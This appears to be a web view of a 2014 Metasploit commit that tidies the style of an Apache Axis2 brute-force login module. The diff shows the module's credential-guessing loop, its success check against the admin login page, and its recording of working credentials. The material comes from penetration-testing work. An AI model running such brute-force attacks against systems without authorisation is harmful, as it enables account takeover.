Style compliance

bug/bundler_fix
James Lee 2014-05-28 14:31:34 -05:00
parent 3ac2182984
commit 05e24326a6
No known key found for this signature in database
GPG Key ID: 2D6094C7CEA0A321
1 changed files with 16 additions and 14 deletions

View File

@ -17,10 +17,12 @@ class Metasploit3 < Msf::Auxiliary
def initialize def initialize
super( super(
'Name' => 'Apache Axis2 v1.4.1 Brute Force Utility', 'Name' => 'Apache Axis2 Brute Force Utility',
'Description' => %q{This module attempts to login to an Apache Axis2 v1.4.1 'Description' => %q{
instance using username and password combindations indicated by the USER_FILE, This module attempts to login to an Apache Axis2 instance using
PASS_FILE, and USERPASS_FILE options. username and password combindations indicated by the USER_FILE,
PASS_FILE, and USERPASS_FILE options. It has been verified to
work on at least versions 1.4.1 and 1.6.2.
}, },
'Author' => 'Author' =>
[ [
@ -35,9 +37,9 @@ class Metasploit3 < Msf::Auxiliary
'License' => MSF_LICENSE 'License' => MSF_LICENSE
) )
register_options( register_options( [
[ Opt::RPORT(8080), Opt::RPORT(8080),
OptString.new('URI', [false, 'Path to the Apache Axis Administration page', '/axis2/axis2-admin/login']), OptString.new('URI', [false, 'Path to the Apache Axis Administration page', '/axis2/axis2-admin/login']),
], self.class) ], self.class)
end end
@ -49,10 +51,10 @@ class Metasploit3 < Msf::Auxiliary
print_status("Verifying login exists at #{target_url}") print_status("Verifying login exists at #{target_url}")
begin begin
res = send_request_cgi({ send_request_cgi({
'method' => 'GET', 'method' => 'GET',
'uri' => datastore['URI'] 'uri' => datastore['URI']
}, 20) }, 20)
rescue rescue
print_error("The Axis2 login page does not exist at #{target_url}") print_error("The Axis2 login page does not exist at #{target_url}")
return return
@ -77,12 +79,12 @@ class Metasploit3 < Msf::Auxiliary
'data' => post_data, 'data' => post_data,
}, 20) }, 20)
if (res and res.code == 200 and res.body.to_s.match(/upload/) != nil) if res && res.code == 200 && res.body.to_s.match(/upload/) != nil
print_good("#{target_url} - Apache Axis - SUCCESSFUL login for '#{user}' : '#{pass}'") print_good("#{target_url} - Apache Axis - SUCCESSFUL login for '#{user}' : '#{pass}'")
report_auth_info( report_auth_info(
:host => rhost, :host => rhost,
:port => rport, :port => rport,
:sname => (ssl ? 'https' : 'http'), :sname => (ssl ? 'https' : 'http'),
:user => user, :user => user,
:pass => pass, :pass => pass,
:proof => "WEBAPP=\"Apache Axis\", VHOST=#{vhost}", :proof => "WEBAPP=\"Apache Axis\", VHOST=#{vhost}",
@ -91,7 +93,7 @@ class Metasploit3 < Msf::Auxiliary
:active => true :active => true
) )
elsif(res and res.code == 200) elsif res && res.code == 200
vprint_error("#{target_url} - Apache Axis - Failed to login as '#{user}'") vprint_error("#{target_url} - Apache Axis - Failed to login as '#{user}'")
else else
vprint_error("#{target_url} - Apache Axis - Unable to authenticate.") vprint_error("#{target_url} - Apache Axis - Unable to authenticate.")